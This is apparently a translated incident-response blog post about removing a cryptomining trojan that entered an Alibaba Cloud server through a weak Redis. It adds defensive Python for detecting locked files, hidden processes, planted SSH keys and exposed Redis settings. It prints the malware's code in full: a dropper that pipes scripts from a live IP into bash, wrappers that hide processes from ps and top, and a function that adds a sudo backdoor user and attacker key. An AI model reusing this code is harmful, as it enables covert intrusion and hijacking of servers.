Alibaba Cloud ECS server tampered with for malicious cryptomining

Came to the lab in a good mood to study, and then...


Checking processes with top and ps showed nothing abnormal (because the top command itself had been tampered with).


Check the cron jobs

crontab -l lanigiro 

Found a cron job that I never set up.

Edit the cron job

crontab -e 

Editing failed

Delete the cron job

crontab -r 

Deletion failed


The reason is that the file had been locked (the append-only and immutable attributes were set on it with chattr)

Unlock it

chattr -ai /var/spool/cron/root 

Unlocking failed: chattr had been deleted by the malware

Download chattr.c

Download chattr.c from https://github.com/posborne/linux-programming-interface-exercises/blob/a93a73842cac2143c873d78a30df5f8f32f5dab8/15-file-attributes/chattr.c

Compile it; this produces a.out

cc chattr.c 
-bash-4.2# cc chattr.c
-bash-4.2# ls
a.out  backup  chattr.c  clamav-0.104.2.linux.x86_64.rpm  disk.pl  Recycle_bin  server  swap  wwwlogs  wwwroot
-bash-4.2#

Rename it

mv a.out chattr 

Run it

./chattr 

Put it back in its usual place

mv chattr /usr/bin/ 

Stop the cron job

Unlock

chattr -ai /var/spool/cron/root 


Check the attributes

lsattr /var/spool/cron/root 

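The unlock step above shows why the immutable (i) and append-only (a) bits matter: crontab -r, rm and every editor fail on a file carrying them, and malware that deletes /usr/bin/chattr leaves no standard tool to clear them. The attributes are only an inode flag word that the kernel exposes through two ioctls (the same ones lsattr and chattr call), so they can be inspected and cleared without chattr or a compiled chattr.c. The following is an added example written for this page, not the author's code or any tool mentioned in the article; it assumes a Linux host and a filesystem that supports the flags (ext4 and xfs do, tmpfs does not), and clearing them requires root.

```python
import fcntl
import os
import struct

# Linux ioctl numbers for the inode flags, built the way the kernel headers do:
# FS_IOC_GETFLAGS = _IOR('f', 1, long), FS_IOC_SETFLAGS = _IOW('f', 2, long).
# The size field is sizeof(long), so it is computed instead of hard-coded.
_LONG = struct.calcsize("l")
FS_IOC_GETFLAGS = 0x80000000 | (_LONG << 16) | (ord("f") << 8) | 1
FS_IOC_SETFLAGS = 0x40000000 | (_LONG << 16) | (ord("f") << 8) | 2
FS_IMMUTABLE_FL = 0x00000010  # shown as 'i' by lsattr
FS_APPEND_FL = 0x00000020     # shown as 'a' by lsattr


def get_attr_flags(path):
    """Return the inode flag word for path, or None if the file cannot be opened
    or the filesystem does not support flags (ENOTTY)."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
    except OSError:
        return None
    try:
        buf = bytearray(_LONG)
        fcntl.ioctl(fd, FS_IOC_GETFLAGS, buf)  # buf is filled in place
        return struct.unpack("l", bytes(buf))[0]
    except OSError:
        return None
    finally:
        os.close(fd)


def describe_flags(flags):
    """Render the two flags that block editing and deletion in lsattr's letters."""
    letters = ""
    if flags & FS_APPEND_FL:
        letters += "a"
    if flags & FS_IMMUTABLE_FL:
        letters += "i"
    return letters or "-"


def clear_lock_flags(path):
    """Equivalent of `chattr -ai path`; needs CAP_LINUX_IMMUTABLE, i.e. root."""
    fd = os.open(path, os.O_RDONLY | os.O_NONBLOCK)
    try:
        buf = bytearray(_LONG)
        fcntl.ioctl(fd, FS_IOC_GETFLAGS, buf)
        flags = struct.unpack("l", bytes(buf))[0]
        flags &= ~(FS_APPEND_FL | FS_IMMUTABLE_FL)
        fcntl.ioctl(fd, FS_IOC_SETFLAGS, struct.pack("l", flags))
    finally:
        os.close(fd)


def locked_files(paths):
    """Subset of paths carrying 'a' or 'i', i.e. the ones rm and crontab -r will refuse."""
    out = []
    for p in paths:
        flags = get_attr_flags(p)
        if flags is not None and flags & (FS_APPEND_FL | FS_IMMUTABLE_FL):
            out.append((p, describe_flags(flags)))
    return out


if __name__ == "__main__":
    # The files this incident locked: the root crontab spool, /etc/crontab and the replaced ps/top.
    for p, letters in locked_files(["/var/spool/cron/root", "/etc/crontab", "/bin/ps", "/bin/top"]):
        print(f"{letters}\t{p}")
```

Run it as root to list what is locked, then call clear_lock_flags on each path before deleting; on a host where the attacker also replaced lsattr, this avoids trusting any binary under /usr/bin for the check.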

Delete the cron job

crontab -r 

Failed

Check the system crontab configuration

cat /etc/crontab 


It has been modified too. Leave it for now and stop the cron service

service crond stop 

Inspect the script

Download the script from the cron job's remote address

```bash
#!/bin/bash
echo "ok22$(date)" >>/tmp/ok.log
export CURL_CMD="curl"
if [ -f /bin/cd1 ];then
  export CURL_CMD="/bin/cd1"
elif [ -f /bin/cur ];then
  export CURL_CMD="/bin/cur"
elif [ -f /bin/TNTcurl ];then
  export CURL_CMD="/bin/TNTcurl"
elif [ -f /bin/curltnt ];then
  export CURL_CMD="/bin/curltnt"
elif [ -f /bin/curl1 ];then
  export CURL_CMD="/bin/curl1"
elif [ -f /bin/cdt ];then
  export CURL_CMD="/bin/cdt"
elif [ -f /bin/xcurl ];then
  export CURL_CMD="/bin/xcurl"
elif [ -x "/bin/cdz" ];then
  export CURL_CMD="/bin/cdz"
fi
sh_url="http://104.192.82.138/s3f1015"
export MOHOME=/var/tmp/.crypto/...
if [ -f ${MOHOME}/.ddns.log ];then
  echo "process possible running"
  current=$(date +%s)
  last_modified=$(stat -c "%Y" ${MOHOME}/.ddns.log)
  if [ $(($current-$last_modified)) -gt 6 ];then
    echo "process is not running"
  else
    ${CURL_CMD} -fsSL -o ${MOHOME}/.ddns.pid ${sh_url}/m/reg0.tar.gz
    exit 0
  fi
fi
if [ "$(id -u)" == "0" ];then
  ${CURL_CMD} -fsSL ${sh_url}/c/ar.sh |bash
else
  ${CURL_CMD} -fsSL ${sh_url}/c/ai.sh |bash
fi
```

It references another address, http://104.192.82.138/s3f1015; downloaded that script and opened it.

It shows that ps and top have been replaced

```bash
export PS_CMD="/bin/ps"
pssize=$(ls -l /bin/ps | awk '{ print $5 }')
${CHATTR} -i /bin/ps
if [ ${pssize} -le 8000 ];then
  ps_name=$(awk '/$@/ {print $1}' /bin/ps)
  if [ ! "${ps_name}" = "ps.lanigiro" ];then
    mv /bin/${ps_name} /bin/ps.lanigiro
  fi
else
  mv /bin/ps /bin/ps.lanigiro
fi
echo "#!/bin/bash">/bin/ps
echo "ps.lanigiro $@ | grep -v 'ddns|httpd'" >>/bin/ps
touch -d 20160825 /bin/ps
chmod a+x /bin/ps
${CHATTR} +i /bin/ps
if [ -x /bin/ps.lanigiro ];then
  PS_CMD="/bin/ps.lanigiro"
fi
topsize=`ls -l /bin/top | awk '{ print $5 }'`
${CHATTR} -i /bin/top
if [ ${topsize} -le 8000 ];then
  top_name=$(awk '/$@/ {print $1}' /bin/top)
  if [ ! "${top_name}" = "top.lanigiro" ];then
    mv /bin/${top_name} /bin/top.lanigiro
  fi
else
  mv /bin/top /bin/top.lanigiro
fi
echo "#!/bin/bash">/bin/top
echo "top.lanigiro $@ | grep -v 'ddns|httpd'">>/bin/top
chmod a+x /bin/top
touch -d 20160716 /bin/top
${CHATTR} +i /bin/top
```
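The installer above does not hide the miner from the kernel. It renames the real binary to ps.lanigiro / top.lanigiro ("original" spelled backwards), writes a two-line shell script in its place that runs the original and pipes the output through grep -v, backdates the mtime, and locks the wrapper with +i. Anything that reads /proc directly still sees every PID, so diffing procfs against what ps reports exposes the hiding, and the installer's own size test (a genuine ps is far larger than 8000 bytes) can be turned around to recognise the wrapper. The following is an added example written for this page, not the author's code or the malware's; the process listings are constructed, and the simulation applies the wrapper's filter as an alternation ("ddns" or "httpd"), which is what its grep -v pattern is meant to do.

```python
import os
import re
import subprocess

# What the replacement ps/top drop from their output before the user sees it.
WRAPPER_FILTER = re.compile(r"ddns|httpd")


def read_proc_pids():
    """PIDs straight from procfs; a userland wrapper around ps cannot remove these."""
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}


def pids_from_ps_output(text):
    """Parse `ps -e -o pid=,comm=` style output (PID first on each line) into a set of PIDs."""
    pids = set()
    for line in text.splitlines():
        fields = line.split()
        if fields and fields[0].isdigit():
            pids.add(int(fields[0]))
    return pids


def hidden_pids(proc_pids, ps_pids):
    """PIDs that exist in /proc but are missing from what ps reported."""
    return sorted(proc_pids - ps_pids)


def is_shell_wrapper(data, max_size=8000):
    """The installer's size heuristic inverted: a real ps/top is a large ELF binary,
    the replacement is a tiny script that chains to a *.lanigiro copy."""
    return len(data) <= max_size and data.startswith(b"#!") and b".lanigiro" in data


def check_binary(path):
    """True if the file at path looks like the malware's wrapper (reads the whole file)."""
    with open(path, "rb") as f:
        return is_shell_wrapper(f.read())


def live_check():
    """Run whatever `ps` is first in PATH (possibly the wrapper) and diff it against /proc."""
    out = subprocess.run(["ps", "-e", "-o", "pid=,comm="],
                         capture_output=True, text=True, check=False).stdout
    return hidden_pids(read_proc_pids(), pids_from_ps_output(out))


# Constructed sample: what the real ps (ps.lanigiro) prints, and what the wrapper lets through.
REAL_PS_OUTPUT = """\
    1 systemd
  539 .ddns
  612 httpd
  780 sshd
"""
WRAPPED_PS_OUTPUT = "\n".join(
    line for line in REAL_PS_OUTPUT.splitlines() if not WRAPPER_FILTER.search(line))


if __name__ == "__main__":
    print("hidden by wrapper in sample:",
          hidden_pids(pids_from_ps_output(REAL_PS_OUTPUT), pids_from_ps_output(WRAPPED_PS_OUTPUT)))
    print("hidden on this host:", live_check())
    for p in ("/bin/ps", "/bin/top", "/bin/pstree"):
        if os.path.exists(p):
            print(p, "wrapper" if check_binary(p) else "ok")
```

On a clean host live_check() returns only PIDs that exited between the two reads (run it twice and intersect if that noise matters); on this host it would have returned the .ddns PID even though the trojaned top and ps showed nothing.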

Running the original top, which the malware renamed to top.lanigiro, reveals the mining process .ddns

top.lanigiro 


Locate the process's executable (the original ps was renamed to ps.lanigiro)

ps.lanigiro -ef | grep 539 


Go into that directory and delete everything; for files that refuse to be deleted, use

chattr -ai xxxx 

(forgot to take a screenshot)

Kill the process

kill 539 

Looking through the script, it seems to add a lot of files. Not sure what they are for; deleted them all

```bash
makesshaxx(){
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD0niuqhmdgATEUH9gaaxhnK9x8y9GopY1MxQe1VGWSps/MGb/ngvEu9DMVrnH/RcsnnPsV1Ncyjd/y4CdvFrR+OoNZquuVfAUbhOUO6up6GxtoObSV3V5lyepnJK5gzmxfelfmotxUzzwMYkgdsdeasVS4pqdASrivsFdG8kf59XG6VAD5j14uojZnLzVwvDs5usHFyS9QRr4pEfd670bO0TAbSQjf76eVwgQTMoQJaK1uHDkeVPuHhLXZtGPF2NVr1fTB3L8udxfQvw1A0OSLoKtYEXrDbiDKrJ+QINLvn8i98k2d+/EvDtM+BpuH8FTw3rC9VuY/IutOo0aY0mRXMn5A1L0x2YCfSavUH+zwf3qPLUW4rQNYxXoX5xzYafLsuYjfvhwYkO4OZb3teOU7vcFcYc1cgthdOtDfllMXmdOJKhMlwVB2xBx3UJyZQdqdOnFTxQ8i1j2li0ywKiARDFypqj+GNSBwpTKhYsWW699oSI79JD9r4tWfxyVyfAs= root@pending.com"
${CHATTR} -ia /etc/passwd;
grep -q lsb /etc/passwd || echo 'lsb:x:1000:1000::/home/lsb:/bin/bash' >> /etc/passwd
${CHATTR} +ia /etc/passwd
${CHATTR} -ia /etc/shadow
grep -q "lsb:$6$4E4W/nnk" /etc/shadow || echo 'lsb:$y$j9T$4mqDHpJ8b4riHWm2FfUHY.$./.VlnKhJMI/hj8f8sxbqhIal0jKhPxjyHxB6ZGtUm6:18849:0:99999:7:::' >> /etc/shadow
${CHATTR} +ia /etc/shadow
${CHATTR} -ia /etc/sudoers
grep -q lsb /etc/sudoers || echo 'lsb ALL=(ALL:ALL) ALL' >> /etc/sudoers
${CHATTR} +i /etc/sudoers
mkdir /home/lsb/.ssh/ -p
${CHATTR} -ia /home/lsb/.ssh/authorized_keys
touch /home/lsb/.ssh/authorized_keys
chmod 600 /home/lsb/.ssh/authorized_keys
grep -q root@pending.com /home/lsb/.ssh/authorized_keys || echo $RSAKEY > /home/lsb/.ssh/authorized_keys
${CHATTR} +ia /home/lsb/.ssh/authorized_keys
${CHATTR} -ia /home/lsb/.ssh/authorized_keys2
touch /home/lsb/.ssh/authorized_keys2
chmod 600 /home/lsb/.ssh/authorized_keys2
grep -q root@pending.com /home/lsb/.ssh/authorized_keys2 || echo $RSAKEY > /home/lsb/.ssh/authorized_keys2
${CHATTR} +ia /home/lsb/.ssh/authorized_keys2
mkdir /root/.ssh/ -p
${CHATTR} -ia /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
grep -q root@pending.com /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys
${CHATTR} +ia /root/.ssh/authorized_keys
${CHATTR} -ia /root/.ssh/authorized_keys2
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys2
grep -q root@pending.com /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2
${CHATTR} +ia /root/.ssh/authorized_keys2
for f in $(ls /home)
do
  if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.profile > /dev/null;then
    echo "{" >> /home/${f}/.profile
    echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.profile
    echo "} > /dev/null 2>&1" >> /home/${f}/.profile
  fi
  if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /home/${f}/.bashrc > /dev/null;then
    echo "{" >> /home/${f}/.bashrc
    echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >> /home/${f}/.bashrc
    echo "} > /dev/null 2>&1" >> /home/${f}/.bashrc
  fi
done
if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.profile > /dev/null;then
  echo "{" >> /root/.profile
  echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.profile
  echo "} > /dev/null 2>&1" >> /root/.profile
fi
if ! grep "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" /root/.bashrc > /dev/null;then
  echo "{" >> /root/.bashrc
  echo "${CURL_CMD} -fsSL ${sh_url}/a/a.sh | bash" >>/root/.bashrc
  echo "} > /dev/null 2>&1" >> /root/.bashrc
fi
}
```
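The makesshaxx function above is the part worth reading closely, because it is the persistence that outlives the cron job: a new user lsb with a known password hash and full sudo is appended to /etc/passwd, /etc/shadow and /etc/sudoers (each re-locked with +ia afterwards); the attacker's public key, recognisable by its root@pending.com comment, is written into authorized_keys and authorized_keys2 for both root and lsb; and a curl ... | bash block is appended to every .profile and .bashrc under /home and /root so the installer reruns at the next login. The triage helper below is an added example for this page, not the author's code; it works on a dict of path to file contents so it runs offline on the constructed sample, and the trusted key comment admin@laptop is an assumed allowlist entry standing in for whatever keys the operator actually issued.

```python
import re

# A remote script piped into a shell from a login file is never legitimate on a server.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Full-sudo grants in /etc/sudoers: "user ALL=(ALL) ALL" or "user ALL=(ALL:ALL) [NOPASSWD:] ALL".
FULL_SUDO = re.compile(r"^(\S+)\s+ALL=\(ALL(?::ALL)?\)\s+(?:NOPASSWD:\s*)?ALL\s*$", re.M)


def rc_file_findings(path, content):
    """Lines in .bashrc/.profile that fetch and execute remote code."""
    return [f"{path}:{n}: remote script piped to shell: {line.strip()}"
            for n, line in enumerate(content.splitlines(), 1)
            if PIPE_TO_SHELL.search(line)]


def authorized_keys_findings(path, content, trusted_comments):
    """Keys whose comment is not on the operator's allowlist (the planted key is root@pending.com)."""
    findings = []
    for n, line in enumerate(content.splitlines(), 1):
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith(("ssh-", "ecdsa-")):
            continue
        comment = parts[2] if len(parts) > 2 else ""
        if comment not in trusted_comments:
            findings.append(f"{path}:{n}: untrusted {parts[0]} key (comment {comment!r})")
    return findings


def sudo_user_findings(passwd, sudoers):
    """Non-root accounts present in /etc/passwd that hold a full sudo grant, like the added 'lsb'."""
    full_sudo = {m.group(1) for m in FULL_SUDO.finditer(sudoers)}
    findings = []
    for line in passwd.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[0] in full_sudo and f[0] != "root":
            findings.append(f"/etc/passwd: user {f[0]} (uid {f[2]}, shell {f[6]}) has full sudo")
    return findings


def triage(files, trusted_comments=()):
    """files maps absolute path -> contents; returns a list of human-readable findings."""
    out = []
    for path, content in files.items():
        if path.endswith((".bashrc", ".profile")):
            out += rc_file_findings(path, content)
        elif path.endswith(("authorized_keys", "authorized_keys2")):
            out += authorized_keys_findings(path, content, set(trusted_comments))
    if "/etc/passwd" in files and "/etc/sudoers" in files:
        out += sudo_user_findings(files["/etc/passwd"], files["/etc/sudoers"])
    return out


# Constructed sample modelled on what makesshaxx leaves behind (key blobs are placeholders).
SAMPLE_FILES = {
    "/root/.bashrc": "alias ll='ls -l'\n{\ncurl -fsSL http://104.192.82.138/s3f1015/a/a.sh | bash\n} > /dev/null 2>&1\n",
    "/root/.ssh/authorized_keys": ("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEY0 admin@laptop\n"
                                   "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEKEY1 root@pending.com\n"),
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nlsb:x:1000:1000::/home/lsb:/bin/bash\n",
    "/etc/sudoers": "root ALL=(ALL) ALL\nlsb ALL=(ALL:ALL) ALL\n",
}


if __name__ == "__main__":
    for finding in triage(SAMPLE_FILES, trusted_comments=["admin@laptop"]):
        print(finding)
```

On a real host, build the dict by reading /etc/passwd, /etc/sudoers, every ~/.ssh/authorized_keys* and every .bashrc/.profile; remember that the files are locked with +ia, so clear the attributes before trying to edit what the triage flags.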

Deleted them through the BT Panel (宝塔) web interface, which makes them easier to find.

Put the original commands back

```bash
cd /usr/bin
chattr -ai ps
mv ps.lanigiro ps
chattr -ai top
mv top.lanigiro top
chattr -ai pstree
mv pstree.lanigiro pstree
```

That is as far as it goes. Not a perfect fix: crontab scheduling no longer works, but that is not very important to me, so...


After reading up on it, I found that this trojan got in through Redis: if remote access is enabled and the password is weak, the server can be broken into. Lost this one completely.
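The entry point the author identified is the well-known Redis one: an instance bound to a public interface with no password, or a guessable one, accepts CONFIG SET dir and CONFIG SET dbfilename from any client, and a SAVE then writes an RDB file containing whatever string the attacker stored in a key into a path such as /var/spool/cron/ or /root/.ssh/. Every setting that path depends on lives in redis.conf. The audit below is an added example for this page, not from the article; it treats a missing bind directive as listening on all interfaces, which is conservative for the Redis versions of that era and an assumption here, and the two sample configurations are constructed.

```python
import re

LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}
# A few values attackers try first; a real audit would use a larger wordlist.
COMMON_PASSWORDS = {"123456", "password", "redis", "root", "admin", "foobared"}
MIN_PASSWORD_LEN = 16


def parse_redis_conf(text):
    """redis.conf is 'directive value...' per line; later occurrences override earlier ones,
    so every value is kept in order and callers take the last."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip().strip('"'))
    return conf


def audit_redis_conf(text):
    """Return the settings that together make the cron/authorized_keys write-through possible."""
    conf = parse_redis_conf(text)
    findings = []

    # Assumption: unset bind means all interfaces (true before Redis 6 unless protected-mode helps).
    binds = conf.get("bind", ["0.0.0.0"])[-1].split()
    exposed = [b for b in binds if b not in LOOPBACK]
    if exposed:
        findings.append(f"bind exposes Redis on {' '.join(exposed)}")

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off")

    password = conf.get("requirepass", [""])[-1]
    if not password:
        findings.append("no requirepass: unauthenticated access")
    elif len(password) < MIN_PASSWORD_LEN or password.lower() in COMMON_PASSWORDS:
        findings.append("requirepass is weak (short or common)")

    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command still available (CONFIG SET dir/dbfilename lets a client write an RDB file anywhere)")
    return findings


# Constructed samples: the exposed setup the post describes, and a hardened one.
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
requirepass 123456
"""

HARDENED_CONF = """\
bind 127.0.0.1
port 6379
protected-mode yes
requirepass 7Qk2mP9vX4rT1nB8zL5wA3cE6dF0hJ
rename-command CONFIG ""
"""


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["ok"])
```

Disabling CONFIG alone is not enough (an attacker who can already write keys can still fill memory, and Redis also has module loading on newer versions); the combination that actually closes the path is loopback-only bind plus a security-group rule on the cloud side, a long random requirepass, and running redis as an unprivileged user whose RDB dir nothing else reads.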

Original article: https://blog.csdn.net/heguu/article/details/123235987?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168466843816800197047861%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=168466843816800197047861&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-10-123235987-null-null.blog_rank_default&utm_term=NAS%E3%80%81%E7%BE%A4%E6%99%96%E3%80%81%E9%98%BF%E9%87%8C%E4%BA%91%E3%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90%E3%80%81%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E3%80%81ipv6%E3%80%81ddns%E3%80%81%E8%BD%BB%E9%87%8F%E7%BA%A7%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E9%93%81%E5%A8%81%E9%A9%AC%E3%80%81%E5%A8%81%E8%81%94%E9%80%9A%E3%80%81DSM%E3%80%81DSM6.0%E3%80%81%E7%BE%A4%E6%99%96nas%E3%80%81%E4%BA%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E3%80%81%E8%9C%97%E7%89%9B%E6%98%9F%E9%99%85%E3%80%81%E9%BB%91%E7%BE%A4%E6%99%96%E3%80%81docker%E3%80%81%E5%AE%B9%E5%99%A8%E9%95%9C%E5%83%8F%E3%80%81%E5%9F%9F%E5%90%8D%E6%B3%A8%E5%86%8C%E3%80%81%E5%AE%9D%E5%A1%94%E3%80%81%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E3%80%81nginx%E3%80%81frp%E3%80%81%E5%8A%A8%E6%80%81%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90
